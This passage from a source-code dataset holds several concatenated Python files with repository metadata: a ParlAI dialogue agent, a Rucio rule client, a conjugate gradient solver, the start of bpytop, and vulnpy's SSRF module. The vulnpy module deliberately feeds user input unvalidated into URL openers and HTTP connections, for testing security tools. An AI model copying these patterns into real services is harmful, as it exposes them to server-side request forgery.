        # _append skips the broadcasting/validation of the public append().
        circuit._append(instruction, dag_node.qargs, dag_node.cargs)
    return circuit
| 33.229508 | 84 | 0.637889 |
4a01ce0f082c4036e643a52aae0a64ca444f8803 | 15,002 | py | Python | projects/image_chat/transresnet_multimodal/transresnet_multimodal.py | harunpehlivan/ParlAI | e1f2942feb8f158964477f4a46bc2c4c741b2ccd | [
"MIT"
] | 1 | 2019-07-25T17:30:18.000Z | 2019-07-25T17:30:18.000Z | projects/image_chat/transresnet_multimodal/transresnet_multimodal.py | abisee/ParlAI | 5507d4745ca23b23af311673a6b0d1b7e72eb5cd | [
"MIT"
] | null | null | null | projects/image_chat/transresnet_multimodal/transresnet_multimodal.py | abisee/ParlAI | 5507d4745ca23b23af311673a6b0d1b7e72eb5cd | [
"MIT"
] | 1 | 2019-07-28T14:53:18.000Z | 2019-07-28T14:53:18.000Z | #!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""Transresnet Multimodal Model (https://arxiv.org/abs/1811.00945)."""
from parlai.core.dict import DictionaryAgent
from parlai.core.utils import round_sigfigs
from .modules import TransresnetMultimodalModel
from projects.personality_captions.transresnet.transresnet import TransresnetAgent
import torch
from torch import optim
import random
import os
import numpy as np
import tqdm
from collections import deque
class TransresnetMultimodalAgent(TransresnetAgent):
"""
Model from "Engaging Image Chat: Modeling Personality in Grounded Dialogue".
See paper for more details: (https://arxiv.org/abs/1811.00945)
An extension of the model from https://arxiv.org/abs/1810.10665; given
an image, personality, and dialogue history, predicts the next utterance
in a dialogue.
"""
######################################
# Initialization and argument parsers
######################################
@staticmethod
def add_cmdline_args(argparser):
"""Override to add personality-override option."""
TransresnetMultimodalModel.add_cmdline_args(argparser)
TransresnetAgent.add_cmdline_args(argparser)
arg_group = argparser.add_argument_group("TransresnetMultimodal Arguments")
argparser.add_argument(
"--personality-override",
type=str,
default=None,
help="for use in other tasks where no personality "
"is given. This will give the model a personality "
"(whichever is specifed).",
)
argparser.add_argument(
"--personalities-path",
type=str,
default=None,
help="Path to personalities list",
)
DictionaryAgent.add_cmdline_args(argparser)
return arg_group
def __init__(self, opt, shared=None):
super().__init__(opt, shared)
self.metrics = {
k: {"hits@1/100": 0.0, "loss": 0.0, "num_samples": 0, "med_rank": []}
for k in ["first_round", "second_round", "third_round+"]
}
if shared is None:
self.optimizer = optim.Adam(
filter(lambda p: p.requires_grad, self.model.parameters()),
self.opt["learningrate"],
)
else:
self.optimizer = shared["optimizer"]
self.history = deque(maxlen=None)
self.personality_override = opt.get("personality_override")
def _build_model(self, path=None):
init_model_path = None
if self.opt.get("init_model") and os.path.isfile(self.opt["init_model"]):
init_model_path = self.opt["init_model"]
elif self.opt.get("model_file") and os.path.isfile(self.opt["model_file"]):
init_model_path = self.opt["model_file"]
elif path is not None:
init_model_path = path
print("Creating or loading model")
self.model = TransresnetMultimodalModel(
self.opt, self.personalities_list, self.dict
)
if init_model_path is not None:
self.load(init_model_path)
if self.use_cuda:
self.model.cuda()
def _setup_cands(self):
"""Override for different call to model."""
self.fixed_cands = None
self.fixed_cands_enc = None
if self.fcp is not None:
with open(self.fcp) as f:
self.fixed_cands = [c.replace("\n", "") for c in f.readlines()]
cands_enc_file = "{}.cands_enc".format(self.fcp)
print("loading saved cand encodings")
if os.path.isfile(cands_enc_file):
self.fixed_cands_enc = torch.load(
cands_enc_file, map_location=lambda cpu, _: cpu
)
else:
print("Extracting cand encodings")
self.model.eval()
pbar = tqdm.tqdm(
total=len(self.fixed_cands),
unit="cand",
unit_scale=True,
desc="Extracting candidate encodings",
)
fixed_cands_enc = []
for _, batch in enumerate(
[
self.fixed_cands[i:i + 50]
for i in range(0, len(self.fixed_cands) - 50, 50)
]
):
embedding = self.model.forward_text_encoder(batch).detach()
fixed_cands_enc.append(embedding)
pbar.update(50)
self.fixed_cands_enc = torch.cat(fixed_cands_enc, 0)
torch.save(self.fixed_cands_enc, cands_enc_file)
def share(self):
"""Override to share optimizer."""
shared = super().share()
shared["optimizer"] = self.optimizer
return shared
def observe(self, observation):
"""
Observe an observation.
Additionally retrieves the dialogue history for the observation.
:param observation:
observation
:return:
the observation, with dialogue history included.
"""
self.observation = self.get_dialogue_history(observation)
return self.observation
def train_step(self, valid_obs, image_feats, personalities, dialogue_histories):
"""
Model train step.
:param valid_obs:
list of valid observations
:param image_feats:
list of image features, one per example
:param personalities:
list of personalities, one per example
:param dialogue_histories:
list of dialogue histories, one per example
:return:
the total loss and the number of correct examples
"""
self.model.train()
labels = [random.choice(v["labels"]) for v in valid_obs]
loss, num_correct, _ = self.model(
image_feats,
personalities,
dialogue_histories,
labels,
batchsize=len(valid_obs),
)
return loss, num_correct
def eval_step(self, valid_obs, image_feats, personalities, dialogue_histories):
"""
Model eval step.
:param valid_obs:
list of valid observations
:param image_feats:
list of image features, one per example
:param personalities:
list of personalities, one per example
:param dialogue_histories:
list of dialogue histories, one per example
:return:
the total loss, number of correct examples,
the ranked position of each correct caption,
and the ranked lists of candidates (one per example)
"""
self.model.eval()
med_rank = None
chosen_responses = None
candidates_encoded = None
if self.fixed_cands is not None:
candidates_encoded = self.fixed_cands_enc
candidates = self.fixed_cands
else:
candidates = [v["label_candidates"] for v in valid_obs]
chosen_responses = self.model.choose_best_response(
image_feats,
personalities,
dialogue_histories,
candidates,
candidates_encoded=candidates_encoded,
k=-1 if self.fixed_cands is None else 100,
batchsize=len(valid_obs),
)
loss = -1
if self.fixed_cands is not None:
num_correct = 0
else:
labels = [v.get("eval_labels") for v in valid_obs]
equality_list = [
1 if chosen_responses[i][0] in labels[i] else 0
for i in range(len(labels))
]
# calculate med ranks
med_rank = []
for i, e_list in enumerate(chosen_responses):
lowest_rank = len(e_list) + 1
for c in labels[i]:
lowest_rank = min(lowest_rank, e_list.index(c) + 1)
med_rank.append(lowest_rank)
num_correct = sum(equality_list)
return loss, num_correct, med_rank, chosen_responses
def batch_act(self, observations):
"""
Act on a batch of observations.
:param observations:
list of observations
:return:
A list of acts, one for each observation
"""
is_training = any(["labels" in obs for obs in observations])
valid_obs, valid_indexes = self.filter_valid_obs(observations, is_training)
image_feats = self.extract_image_feats(valid_obs)
personalities, dialogue_histories, dialogue_round = self.extract_texts(
valid_obs
)
chosen_responses = None
med_rank = None
if is_training:
self.optimizer.zero_grad()
loss, num_correct = self.train_step(
valid_obs, image_feats, personalities, dialogue_histories
)
loss.backward()
self.optimizer.step()
else:
loss, num_correct, med_rank, chosen_responses = self.eval_step(
valid_obs, image_feats, personalities, dialogue_histories
)
self.update_metrics(loss, num_correct, len(valid_obs), dialogue_round, med_rank)
result = [
{"text": "No Response During Traiing", "id": self.getID()}
for _ in range(len(observations))
]
if chosen_responses is not None:
for i, index_obs in enumerate(valid_indexes):
result[index_obs]["text"] = chosen_responses[i][0]
result[index_obs]["text_candidates"] = chosen_responses[i]
return result
def extract_texts(self, obs):
"""
Extract the personalities and dialogue histories from observations.
Additionally determine which dialogue round we are in.
Note that this function assumes that the personality is the
last line of the `text` field in the observation.
:param obs:
list of observations
:return:
a list of personalities, a list of dialogue histories, and the
current dialogue round (either first, second, or third+)
"""
splits = [v.get("text").split("\n") for v in obs]
if self.personality_override:
splits = [s + [self.personality_override] for s in splits]
personalities = [t[-1] for t in splits]
dialogue_histories = None
dialogue_round = "first_round"
if len(splits[0]) >= 2:
dialogue_round = "second_round" if len(splits[0]) == 2 else "third_round+"
dialogue_histories = ["\n".join(t[:-1]) for t in splits]
return personalities, dialogue_histories, dialogue_round
def get_dialogue_history(self, obs):
"""
Get dialogue history for an observation.
:param obs:
observation
:return:
the observation with the dialogue history in the `text` field
"""
if len(self.history) > 0:
obs["text"] = "\n".join(self.history) + "\n" + obs["text"]
if "labels" in obs:
self.history.append(random.choice(obs["labels"]))
elif "eval_labels" in obs:
self.history.append(random.choice(obs["eval_labels"]))
if obs.get("episode_done", True):
# end of this episode, clear the history
self.history.clear()
return obs
def update_metrics(
self, loss, num_correct, num_samples, dialogue_round, med_rank=None
):
"""
Update Metrics.
Overriden to include dialogue round
:param loss:
float loss
:param num_correct:
number of examples for which chosen caption is correct
:param num_samples:
total number of examples
:param med_rank:
rank of correct caption for each example
"""
self.metrics[dialogue_round]["hits@1/100"] += num_correct
self.metrics[dialogue_round]["loss"] += loss
self.metrics[dialogue_round]["num_samples"] += num_samples
if med_rank:
self.metrics[dialogue_round]["med_rank"] += med_rank
def receive_metrics(self, metrics_dict):
"""
Receive the metrics from validation.
Unfreeze text encoder weights after a certain number of rounds without improvement.
Override to account for different dialogue rounds.
:param metrics_dict:
the metrics dictionary
"""
if "tasks" in metrics_dict:
metrics_dict = metrics_dict["tasks"]["internal:comment_battle:imageDialog"]
if self.freeze_patience != -1 and self.is_frozen:
m_key = "hits@1/100"
ms = [
metrics_dict[r].get(m_key, -1)
for r in ["first_round", "second_round", "third_round+"]
]
m = sum(ms) / len([m for m in ms if m >= 0])
if m > self.freeze_best_metric:
self.freeze_impatience = 0
self.freeze_best_metric = m
print("performance not good enough to unfreeze the model.")
else:
self.freeze_impatience += 1
print("Growing impatience for unfreezing")
if self.freeze_impatience >= self.freeze_patience:
self.is_frozen = False
print(
"Reached impatience for fine tuning. "
"Reloading the best model so far."
)
self._build_model(self.model_file)
if self.use_cuda:
self.model = self.model.cuda()
print("Unfreezing.")
self.model.unfreeze_text_encoder()
print("Done")
def reset(self):
"""Override to reset dialogue history."""
super().reset()
self.history.clear()
def reset_metrics(self):
"""Reset per-dialogue round metrics."""
for v in self.metrics.values():
v["hits@1/100"] = 0.0
v["loss"] = 0.0
v["num_samples"] = 0.0
if "med_rank" in v:
v["med_rank"] = []
def report(self):
"""Report per-dialogue round metrics."""
m = {k: {} for k in ["first_round", "second_round", "third_round+"]}
for k, v in self.metrics.items():
if v["num_samples"] > 0:
m[k]["hits@1/100"] = round_sigfigs(
v["hits@1/100"] / v["num_samples"], 4
)
m[k]["loss"] = round_sigfigs(v["loss"] / v["num_samples"], 4)
if "med_rank" in v:
m[k]["med_rank"] = np.median(v["med_rank"])
return m
| 35.804296 | 91 | 0.571724 |
8cc86864d54ff32def0d2c405eac9387d5e6c3d3 | 3,888 | py | Python | src/vulnpy/trigger/ssrf.py | lostsnow/vulnpy | ebdba9658b38f6282dffaf02286c3460a28a7afe | [
"MIT"
] | null | null | null | src/vulnpy/trigger/ssrf.py | lostsnow/vulnpy | ebdba9658b38f6282dffaf02286c3460a28a7afe | [
"MIT"
] | 1 | 2022-02-07T07:43:35.000Z | 2022-02-07T07:43:35.000Z | src/vulnpy/trigger/ssrf.py | lostsnow/vulnpy | ebdba9658b38f6282dffaf02286c3460a28a7afe | [
"MIT"
] | 1 | 2022-01-12T02:50:14.000Z | 2022-01-12T02:50:14.000Z | """
In PY3, urllib2 was ported mostly to urllib.request.
The original PY2 urllib module is unique to PY2.
In this module, we use urllib2 and urllib.request methods
interchangeably depending on the version of python. We refer
to the original PY2 urllib module as "legacy".
"""
import io
import mock
import os
from urllib.request import Request, urlopen
from http.client import HTTPConnection, HTTPSConnection
# On PY2 this name aliased the legacy urllib.urlopen; under PY3 both names
# resolve to urllib.request.urlopen (see the module docstring).
legacy_urlopen = urlopen

# Sentinel status returned by the trigger helpers when the request raises.
EXCEPTION_CODE = -100
# Known-safe request components, used when only one part of the request is
# attacker-controlled.
TRUSTED_HOST = "example.com"
TRUSTED_METHOD = "GET"
TRUSTED_URL = "/"
def mock_connection(func):
    """
    Mock out socket connections for SSRF unless we see the
    VULNPY_REAL_SSRF_REQUESTS environment variable. This should
    only be used when vulnpy is being stood up as a real webapp.
    For unit testing with vulnpy, it's probably best to use the
    default behavior to avoid overloading some third-party server.
    """

    def wrapper(*args):
        if os.environ.get("VULNPY_REAL_SSRF_REQUESTS"):
            return func(*args)
        # Any socket "opened" inside the wrapped call reads a canned 200
        # response instead of touching the network.
        mock_socket = mock.MagicMock()
        mock_socket.makefile.return_value = io.BytesIO(b"HTTP/1.1 200 OK")
        with mock.patch("socket.create_connection", return_value=mock_socket):
            return func(*args)

    return wrapper
@mock_connection
def _urlopen(urlopen_func, arg):
    # Deliberately vulnerable (SSRF trigger): `arg` flows unvalidated into
    # the URL opener. Returns the HTTP status code, or EXCEPTION_CODE if the
    # request raises for any reason.
    try:
        return urlopen_func(arg).getcode()
    except Exception:
        return EXCEPTION_CODE
def do_legacy_urlopen(user_input):
    """
    PY2: urllib.urlopen
    PY3: urllib.request.urlopen (fallback only, not intended for use)
    """
    return _urlopen(legacy_urlopen, user_input)
def do_urlopen_str(user_input):
    """
    PY2: urllib2.urlopen
    PY3: urllib.request.urlopen
    """
    return _urlopen(urlopen, user_input)
def do_urlopen_obj(user_input):
    """
    Same as urlopen_str, but first creates a request object.
    """
    try:
        req = Request(user_input)
    except Exception:
        # A malformed URL still exercises _urlopen, which will report
        # EXCEPTION_CODE for the None request.
        req = None
    return _urlopen(urlopen, req)
@mock_connection
def _request(user_input, connection_class, method_name, vulnerable_url):
    # Deliberately vulnerable (SSRF trigger): exactly one component of the
    # request is attacker-controlled — the URL when vulnerable_url is True,
    # otherwise the HTTP method.
    try:
        c = connection_class(TRUSTED_HOST)
        request_method = getattr(c, method_name)
        if vulnerable_url:
            request_method(TRUSTED_METHOD, user_input)
        else:
            request_method(user_input, TRUSTED_URL)
        if method_name == "putrequest":
            # putrequest only starts the request; headers must be completed
            # before a response can be read.
            c.endheaders()
        return c.getresponse().status
    except Exception:
        return EXCEPTION_CODE
def do_httpconnection_request_url(user_input):
    # SSRF trigger: user input as the request URL over HTTP.
    return _request(user_input, HTTPConnection, "request", True)
def do_httpconnection_request_method(user_input):
    # SSRF trigger: user input as the HTTP method over HTTP.
    return _request(user_input, HTTPConnection, "request", False)
def do_httpconnection_putrequest_url(user_input):
    # SSRF trigger: user input as the URL via putrequest over HTTP.
    return _request(user_input, HTTPConnection, "putrequest", True)
def do_httpconnection_putrequest_method(user_input):
    # SSRF trigger: user input as the HTTP method via putrequest over HTTP.
    return _request(user_input, HTTPConnection, "putrequest", False)
def do_httpsconnection_request_url(user_input):
    # SSRF trigger: user input as the request URL over HTTPS.
    return _request(user_input, HTTPSConnection, "request", True)
def do_httpsconnection_request_method(user_input):
    # SSRF trigger: user input as the HTTP method over HTTPS.
    return _request(user_input, HTTPSConnection, "request", False)
def do_httpsconnection_putrequest_url(user_input):
    # SSRF trigger: user input as the URL via putrequest over HTTPS.
    return _request(user_input, HTTPSConnection, "putrequest", True)
def do_httpsconnection_putrequest_method(user_input):
    # SSRF trigger: user input as the HTTP method via putrequest over HTTPS.
    return _request(user_input, HTTPSConnection, "putrequest", False)
@mock_connection
def _request_init(user_input, connection_class):
    # Deliberately vulnerable (SSRF trigger): user input is used as the
    # connection host itself.
    try:
        c = connection_class(user_input)
        c.request(TRUSTED_METHOD, TRUSTED_URL)
        return c.getresponse().status
    except Exception:
        return EXCEPTION_CODE
def do_httpconnection_init(user_input):
    # SSRF trigger: user input as the HTTPConnection host.
    return _request_init(user_input, HTTPConnection)
def do_httpsconnection_init(user_input):
    # SSRF trigger: user input as the HTTPSConnection host.
    return _request_init(user_input, HTTPSConnection)
| 26.09396 | 78 | 0.729424 |
b08a53f8f2cca5db35c0a916d013c15bb78601ae | 11,815 | py | Python | lib/rucio/client/ruleclient.py | mageirakos/rucio | d783ab74bc8d398656e98253ab2547de1f120ea9 | [
"Apache-2.0"
] | null | null | null | lib/rucio/client/ruleclient.py | mageirakos/rucio | d783ab74bc8d398656e98253ab2547de1f120ea9 | [
"Apache-2.0"
] | null | null | null | lib/rucio/client/ruleclient.py | mageirakos/rucio | d783ab74bc8d398656e98253ab2547de1f120ea9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2013-2018 CERN for the benefit of the ATLAS collaboration.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
# - Martin Barisits <martin.barisits@cern.ch>, 2013-2018
# - Vincent Garonne <vgaronne@gmail.com>, 2013-2018
# - Cedric Serfon <cedric.serfon@cern.ch>, 2014-2015
# - Ralph Vigne <ralph.vigne@cern.ch>, 2015
# - Joaquin Bogado <jbogado@linti.unlp.edu.ar>, 2018
#
# PY3K COMPATIBLE
try:
from urllib import quote_plus
except ImportError:
from urllib.parse import quote_plus
from json import dumps, loads
from requests.status_codes import codes
from rucio.client.baseclient import BaseClient
from rucio.client.baseclient import choice
from rucio.common.utils import build_url
class RuleClient(BaseClient):
    """RuleClient class for working with replication rules"""

    # All endpoints below live under this path on the Rucio server.
    RULE_BASEURL = 'rules'

    def __init__(self, rucio_host=None, auth_host=None, account=None, ca_cert=None, auth_type=None, creds=None, timeout=600, dq2_wrapper=False):
        super(RuleClient, self).__init__(rucio_host, auth_host, account, ca_cert, auth_type, creds, timeout, dq2_wrapper)

    def add_replication_rule(self, dids, copies, rse_expression, weight=None, lifetime=None, grouping='DATASET', account=None,
                             locked=False, source_replica_expression=None, activity=None, notify='N', purge_replicas=False,
                             ignore_availability=False, comment=None, ask_approval=False, asynchronous=False, priority=3,
                             meta=None):
        """
        :param dids: The data identifier set.
        :param copies: The number of replicas.
        :param rse_expression: Boolean string expression to give the list of RSEs.
        :param weight: If the weighting option of the replication rule is used, the choice of RSEs takes their weight into account.
        :param lifetime: The lifetime of the replication rules (in seconds).
        :param grouping: ALL -  All files will be replicated to the same RSE.
                         DATASET - All files in the same dataset will be replicated to the same RSE.
                         NONE - Files will be completely spread over all allowed RSEs without any grouping considerations at all.
        :param account: The account owning the rule.
        :param locked: If the rule is locked, it cannot be deleted.
        :param source_replica_expression: RSE Expression for RSEs to be considered for source replicas.
        :param activity: Transfer Activity to be passed to FTS.
        :param notify: Notification setting for the rule (Y, N, C).
        :param purge_replicas: When the rule gets deleted purge the associated replicas immediately.
        :param ignore_availability: Option to ignore the availability of RSEs.
        :param ask_approval: Ask for approval of this replication rule.
        :param asynchronous: Create rule asynchronously by judge-injector.
        :param priority: Priority of the transfers.
        :param comment: Comment about the rule.
        :param meta: Metadata, as dictionary.
        :returns: The server's JSON response (the ids of the created rules).
        """
        path = self.RULE_BASEURL + '/'
        url = build_url(choice(self.list_hosts), path=path)
        # TODO remove the subscription_id from the client; It will only be used by the core;
        data = dumps({'dids': dids, 'copies': copies, 'rse_expression': rse_expression,
                      'weight': weight, 'lifetime': lifetime, 'grouping': grouping,
                      'account': account, 'locked': locked, 'source_replica_expression': source_replica_expression,
                      'activity': activity, 'notify': notify, 'purge_replicas': purge_replicas,
                      'ignore_availability': ignore_availability, 'comment': comment, 'ask_approval': ask_approval,
                      'asynchronous': asynchronous, 'priority': priority, 'meta': meta})
        r = self._send_request(url, type='POST', data=data)
        if r.status_code == codes.created:
            return loads(r.text)
        # Any non-created status is translated to a client-side exception.
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def delete_replication_rule(self, rule_id, purge_replicas=None):
        """
        Deletes a replication rule and all associated locks.

        :param rule_id: The id of the rule to be deleted
        :param purge_replicas: Immediately delete the replicas.
        :returns: True on success.
        :raises: RuleNotFound, AccessDenied
        """
        path = self.RULE_BASEURL + '/' + rule_id
        url = build_url(choice(self.list_hosts), path=path)
        data = dumps({'purge_replicas': purge_replicas})
        r = self._send_request(url, type='DEL', data=data)
        if r.status_code == codes.ok:
            return True
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def get_replication_rule(self, rule_id, estimate_ttc=False):
        """
        Get a replication rule.

        :param rule_id: The id of the rule to be retrieved.
        :param estimate_ttc: bool, if rule_info should return ttc information
        :returns: The rule as a dictionary.
        :raises: RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id
        url = build_url(choice(self.list_hosts), path=path)
        data = dumps({'estimate_ttc': estimate_ttc})
        r = self._send_request(url, type='GET', data=data)
        if r.status_code == codes.ok:
            return next(self._load_json_data(r))
        else:
            exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
            raise exc_cls(exc_msg)

    def update_replication_rule(self, rule_id, options):
        """
        :param rule_id: The id of the rule to be retrieved.
        :param options: Options dictionary.
        :returns: True on success.
        :raises: RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id
        url = build_url(choice(self.list_hosts), path=path)
        data = dumps({'options': options})
        r = self._send_request(url, type='PUT', data=data)
        if r.status_code == codes.ok:
            return True
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def reduce_replication_rule(self, rule_id, copies, exclude_expression=None):
        """
        :param rule_id: Rule to be reduced.
        :param copies: Number of copies of the new rule.
        :param exclude_expression: RSE Expression of RSEs to exclude.
        :returns: The server's JSON response (the id of the new rule).
        :raises: RuleReplaceFailed, RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id + '/reduce'
        url = build_url(choice(self.list_hosts), path=path)
        data = dumps({'copies': copies, 'exclude_expression': exclude_expression})
        r = self._send_request(url, type='POST', data=data)
        if r.status_code == codes.ok:
            return loads(r.text)
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def move_replication_rule(self, rule_id, rse_expression):
        """
        Move a replication rule to another RSE and, once done, delete the original one.

        :param rule_id: Rule to be moved.
        :param rse_expression: RSE expression of the new rule.
        :returns: The server's JSON response (the id of the new rule).
        :raises: RuleNotFound, RuleReplaceFailed
        """
        path = self.RULE_BASEURL + '/' + rule_id + '/move'
        url = build_url(choice(self.list_hosts), path=path)
        data = dumps({'rule_id': rule_id, 'rse_expression': rse_expression})
        r = self._send_request(url, type='POST', data=data)
        if r.status_code == codes.created:
            return loads(r.text)
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def approve_replication_rule(self, rule_id):
        """
        :param rule_id: Rule to be approved.
        :returns: True on success.
        :raises: RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id
        url = build_url(choice(self.list_hosts), path=path)
        # Approval is expressed as an update with the 'approve' option set.
        data = dumps({'options': {'approve': True}})
        r = self._send_request(url, type='PUT', data=data)
        if r.status_code == codes.ok:
            return True
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def deny_replication_rule(self, rule_id):
        """
        :param rule_id: Rule to be denied.
        :returns: True on success.
        :raises: RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id
        url = build_url(choice(self.list_hosts), path=path)
        data = dumps({'options': {'approve': False}})
        r = self._send_request(url, type='PUT', data=data)
        if r.status_code == codes.ok:
            return True
        exc_cls, exc_msg = self._get_exception(headers=r.headers, status_code=r.status_code, data=r.content)
        raise exc_cls(exc_msg)

    def list_replication_rule_full_history(self, scope, name):
        """
        List the rule history of a DID.

        :param scope: The scope of the DID.
        :param name: The name of the DID.
        :returns: A generator over the history entries (dictionaries).
        """
        path = '/'.join([self.RULE_BASEURL, quote_plus(scope), quote_plus(name), 'history'])
        url = build_url(choice(self.list_hosts), path=path)
        r = self._send_request(url, type='GET')
        if r.status_code == codes.ok:
            return self._load_json_data(r)
        exc_cls, exc_msg = self._get_exception(r.headers, r.status_code)
        raise exc_cls(exc_msg)

    def examine_replication_rule(self, rule_id):
        """
        Examine a replication rule for errors during transfer.

        :param rule_id: Rule to be denied.
        :returns: The analysis result as a dictionary.
        :raises: RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id + '/analysis'
        url = build_url(choice(self.list_hosts), path=path)
        r = self._send_request(url, type='GET')
        if r.status_code == codes.ok:
            return next(self._load_json_data(r))
        exc_cls, exc_msg = self._get_exception(r.headers, r.status_code)
        raise exc_cls(exc_msg)

    def list_replica_locks(self, rule_id):
        """
        List details of all replica locks for a rule.

        :param rule_id: Rule to be denied.
        :returns: A generator over the lock entries (dictionaries).
        :raises: RuleNotFound
        """
        path = self.RULE_BASEURL + '/' + rule_id + '/locks'
        url = build_url(choice(self.list_hosts), path=path)
        r = self._send_request(url, type='GET')
        if r.status_code == codes.ok:
            return self._load_json_data(r)
        exc_cls, exc_msg = self._get_exception(r.headers, r.status_code)
        raise exc_cls(exc_msg)
| 47.26 | 151 | 0.620652 |
dfb97bec15ebde74e8a91f92daea8efc241db44a | 1,410 | py | Python | parla/comps/determiter/pcg.py | rileyjmurray/parla | b1f638cb60913c98c75fd721ca002521344fc3cf | [
"BSD-3-Clause"
] | 6 | 2021-12-07T16:52:26.000Z | 2022-03-10T15:35:02.000Z | parla/comps/determiter/pcg.py | rileyjmurray/parla | b1f638cb60913c98c75fd721ca002521344fc3cf | [
"BSD-3-Clause"
] | 1 | 2022-01-12T20:30:38.000Z | 2022-01-12T23:04:34.000Z | parla/comps/determiter/pcg.py | rileyjmurray/parla | b1f638cb60913c98c75fd721ca002521344fc3cf | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import scipy.linalg as la
def pcg(mv_mat, rhs, mv_pre, iter_lim, tol, x0):
# mv_mat is a function handle, representing mv_mat(vec) = mat @ vec
# for a positive definite matrix mat.
#
# Use PCG to solve mat @ x == rhs.
#
# mv_pre is a function handle, representing mv_pre(vec) = M @ M.T @ vec
# where M.T @ mat @ M is a better-conditioned positive definite matrix than mat.
#
# residuals[i] is the error ||mat x - rhs||_2^2 at iteration i.
x = x0.copy()
residuals = -np.ones(iter_lim)
r = rhs - mv_mat(x)
d = mv_pre(r)
delta1_old = np.dot(r, d)
delta1_new = delta1_old
cur_err = la.norm(r)
rel_tol = tol * cur_err
i = 0
while i < iter_lim and cur_err > rel_tol:
# TODO: provide the option of recording || r ||_2^2, not just ||M' r||_2^2.
#residuals[i] = delta1_old
residuals[i] = cur_err
q = mv_mat(d)
den = np.dot(d, q) # equal to d'*mat*d
alpha = delta1_new / den
x += alpha * d
if i % 10 == 0:
r = rhs - mv_mat(x)
else:
r -= alpha * q
cur_err = la.norm(r)
s = mv_pre(r)
delta1_old = delta1_new
delta1_new = np.dot(r, s) # equal to ||M'r||_2^2.
beta = delta1_new / delta1_old
d = s + beta * d
i += 1
residuals = residuals[:i]
return x, residuals
| 29.375 | 84 | 0.551064 |
2ebf9fa7dfb072c0f8cdd90788adbd199305d280 | 213,810 | py | Python | bpytop.py | caughtquick/bpytop | 56f80fcf3258008e302a28d7bab93fdf3238c007 | [
"Apache-2.0"
] | null | null | null | bpytop.py | caughtquick/bpytop | 56f80fcf3258008e302a28d7bab93fdf3238c007 | [
"Apache-2.0"
] | null | null | null | bpytop.py | caughtquick/bpytop | 56f80fcf3258008e302a28d7bab93fdf3238c007 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
# pylint: disable=not-callable, no-member, unsubscriptable-object
# indent = tab
# tab-size = 4
# Copyright 2021 Aristocratos (jakob@qvantnet.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os, sys, io, threading, signal, re, subprocess, logging, logging.handlers, argparse
import urllib.request
from time import time, sleep, strftime
from datetime import timedelta
from _thread import interrupt_main
from collections import defaultdict
from select import select
from distutils.util import strtobool
from string import Template
from math import ceil, floor
from random import randint
from shutil import which
from typing import List, Dict, Tuple, Union, Any, Iterable
#* Collect import errors instead of failing immediately so a combined report can be printed below
errors: List[str] = []
try: import fcntl, termios, tty, pwd
except Exception as e: errors.append(f'{e}')
try: import psutil # type: ignore
except Exception as e: errors.append(f'{e}')
#* Timestamp taken at program start
SELF_START = time()
#* Rough platform detection from sys.platform; "Other" is reported as unsupported below
SYSTEM: str
if "linux" in sys.platform: SYSTEM = "Linux"
elif "bsd" in sys.platform: SYSTEM = "BSD"
elif "darwin" in sys.platform: SYSTEM = "MacOS"
else: SYSTEM = "Other"
#* Abort with a readable error report if required modules are missing or the platform is unsupported
if errors:
	print("ERROR!")
	print("\n".join(errors))
	if SYSTEM == "Other":
		print("\nUnsupported platform!\n")
	else:
		print("\nInstall required modules!\n")
	raise SystemExit(1)
VERSION: str = "1.0.65"
#? Argument parser ------------------------------------------------------------------------------->
args = argparse.ArgumentParser()
args.add_argument("-b", "--boxes", action="store", dest="boxes", help = "which boxes to show at start, example: -b \"cpu mem net proc\"")
args.add_argument("-lc", "--low-color", action="store_true", help = "disable truecolor, converts 24-bit colors to 256-color")
args.add_argument("-v", "--version", action="store_true", help = "show version info and exit")
args.add_argument("--debug", action="store_true", help = "start with loglevel set to DEBUG overriding value set in config")
stdargs = args.parse_args()
if stdargs.version:
	print(f'bpytop version: {VERSION}\n'
		f'psutil version: {".".join(str(x) for x in psutil.version_info)}')
	raise SystemExit(0)
#* Command line overrides, consumed after the config is loaded further down
ARG_BOXES: str = stdargs.boxes
LOW_COLOR: bool = stdargs.low_color
DEBUG: bool = stdargs.debug
BANNER_SRC: List[Tuple[str, str, str]] = [
("#ffa50a", "#0fd7ff", "██████╗ ██████╗ ██╗ ██╗████████╗ ██████╗ ██████╗"),
